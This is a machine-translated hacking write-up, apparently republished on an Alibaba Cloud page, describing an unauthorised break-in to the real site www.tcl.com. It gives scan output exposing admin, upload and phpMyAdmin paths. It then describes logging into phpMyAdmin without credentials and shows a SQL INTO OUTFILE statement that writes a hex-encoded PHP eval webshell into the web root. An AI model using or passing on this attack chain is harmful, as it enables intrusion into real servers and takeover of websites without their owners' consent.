TCL Penetration Process

Source: Internet
Author: User

Daniel laughed. In fact, this is luck.

Target website www.tcl.com

Website Structure

Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9
Mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0

The scan result is as follows:

Http://www.tcl.com: 80/% 23sql. aspHTTP/1.1 200 OK
Http://www.tcl.com: 80/% 23sql. aspxHTTP/1.1 200 OK
Http://www.tcl.com: 80/% 23sql. phpHTTP/1.1 200 OK
Http://www.tcl.com: 80/aHTTP/1.1 200 OK
Http://www.tcl.com: 80/cgi-bin/HTTP/1.1 403 Forbidden
Http://www.tcl.com: 80/index. phpHTTP/1.1 200 OK
Http://www.tcl.com: 80/main/HTTP/1.1 403 Forbidden
Http://www.tcl.com: 80/NewsHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/HTTP/1.1 200 OK
Http://www.tcl.com: 80/news/admin/default. aspHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/admin/default. aspxHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/admin/default. phpHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/admin/upfile. aspHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/admin/upfile. aspxHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/admin/upfile. phpHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/admin_login.aspHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/admin_login.aspxHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/admin_login.phpHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/login. aspHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/login. aspxHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/login. phpHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/manage/login. aspHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/manage/login. aspxHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/manage/login. phpHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/newadmin/HTTP/1.1 200 OK
Http://www.tcl.com: 80/news/newadmin/test. aspHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/newadmin/test. aspxHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/newadmin/test. phpHTTP/1.1 200 OK
Http://www.tcl.com: 80/newslogin.htm. HTTP/1.1 200 OK
Http://www.tcl.com: 80/phpinfo. phpHTTP/1.1 200 OK
Http://www.tcl.com: 80/upload. phpHTTP/1.1 200 OK
Http://www.tcl.com: 80/upload. php? Action = upfileHTTP/1.1 200 OK
Http://www.tcl.com: 80/phpinfo. phpHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/wenzhang. mdbHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/admin/upfile. aspHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/HTTP/1.1 200 OK
Http://www.tcl.com: 80/phpmyadmin/HTTP/1.1 200 OK
 

There are still many issues that will not be sent

Access http://www.tcl.com: 80/newslogin.htm.

Directly expose the path

Fatal error: Cannot instantiate abstract class Action in/opt/lampp/htdocs/tcl/Front/Runtime /~ Runtime. php on line 2

Now let's take a look at this http://www.tcl.com: 80/phpmyadmin/

Try to access

This SB vulnerability exists in the background of phpmyadmin without having to use any account or password. If you really don't understand the tcl website, the website protection staff will have this vulnerability.
After logging on to the phpmyadmin background, didn't we get the absolute path strength?

Write a sentence using SQL


Click SQL

Select 0x3C3F706870206576616C28245F504F53545B636D645D293F3E into outfile/opt/lampp/htdocs/tcl/2b. php;

Access www.tcl.com/2b.php and use the client to connect to www.tcl.com/2b.php.

The displayed blank indicates that the data is successfully inserted and connected to the client.

The next thing to win is to pass the webshell, and I will not take a txt flash.

 

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.